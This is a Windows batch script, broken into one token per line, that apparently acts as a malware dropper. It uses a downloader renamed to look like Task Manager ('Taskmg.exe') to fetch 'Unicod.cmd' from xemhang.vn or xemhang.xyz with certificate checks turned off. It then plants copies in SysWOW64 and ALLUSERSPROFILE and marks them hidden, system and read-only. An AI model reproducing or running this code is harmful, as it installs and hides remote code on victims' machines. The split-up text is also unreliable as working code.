@
echo
off
exit
IF
EXIST
``
%
ALLUSERSPROFILE
%
\4_2.txt
''
(
Goto
:
EXITF
)
Type
nul
>
''
%
ALLUSERSPROFILE
%
\4_2.txt
''
del
/f
/q
``
%
ALLUSERSPROFILE
%
\1fix.txt
''
>
nul
2
>
nul
del
/f
/q
``
%
ALLUSERSPROFILE
%
\2fix.txt
''
>
nul
2
>
nul
del
/f
/q
``
%
ALLUSERSPROFILE
%
\3fix.txt
''
>
nul
2
>
nul
del
/f
/q
``
%
ALLUSERSPROFILE
%
\4fix.txt
''
>
nul
2
>
nul
IF
EXIST
``
%
ALLUSERSPROFILE
%
\Taskmg.exe
''
(
set
``
Taskmg=
%
ALLUSERSPROFILE
%
\Taskmg.exe
''
goto
:
FixCod1
)
IF
EXIST
``
C
:
\SysWOW64\Taskmg.exe
''
(
set
``
Taskmg=C
:
\SysWOW64\Taskmg.exe
''
goto
:
FixCod1
)
exit
/b
:
FixCod1
attrib
-h
-r
-s
``
%
WINDIR
%
\SysWOW64\Unicod.cmd
''
>
nul
2
>
nul
attrib
-h
-r
-s
``
%
ALLUSERSPROFILE
%
\Unicod.cmd
''
>
nul
2
>
nul
CD
``
%
ALLUSERSPROFILE
%
\
pushd
``
%
ALLUSERSPROFILE
%
\
''
%
Taskmg
%
''
-c
-tries=10
--
no-check-certificate
http
:
//xemhang.vn/Website/Unicod.cmd
--
header
``
Referer
:
www.xemhang.vn
''
-O
``
FixUnicod.cmd
''
choice
/n
/c
yn
/t
1
/d
y
>
nul
2
>
nul
for
%
%
a
in
(
``
%
ALLUSERSPROFILE
%
\FixUnicod.cmd
''
)
do
Set
``
Szefixx=
%
%
~za
''
if
``
%
Szefixx
%
''
==
``
''
Goto
:
DLoadFix2
if
``
%
Szefixx
%
''
==
``
0
''
Goto
:
DLoadFix2
if
%
Szefixx
%
gtr
15
Goto
:
runcopy
:
DLoadFix2
''
%
Taskmg
%
''
-c
-tries=10
--
limit-rate
1m
--
no-check-certificate
``
xemhang.xyz/Website/Unicod.cmd
''
-q
-O
``
%
ALLUSERSPROFILE
%
\FixUnicod.cmd
''
choice
/n
/c
yn
/t
1
/d
y
>
nul
2
>
nul
:
runcopy
Copy
/v
/b
/y
``
%
ALLUSERSPROFILE
%
\FixUnicod.cmd
''
``
%
WINDIR
%
\SysWOW64\Unicod.cmd
''
>
nul
2
>
nul
Copy
/v
/b
/y
``
%
ALLUSERSPROFILE
%
\FixUnicod.cmd
''
``
%
ALLUSERSPROFILE
%
\Unicod.cmd
''
>
nul
2
>
nul
Del
/f
/q
``
%
ALLUSERSPROFILE
%
\FixUnicod.cmd
''
>
nul
2
>
nul
attrib
+h
+r
+s
``
%
WINDIR
%
\SysWOW64\Unicod.cmd
''
>
nul
2
>
nul
attrib
+h
+r
+s
``
%
ALLUSERSPROFILE
%
\Unicod.cmd
''
>
nul
2
>
nul
del
/f
/q
``
%
ALLUSERSPROFILE
%
\fixweb.cmd
''
>
nul
2
>
nul
exit
:
EXITF
.
CMD
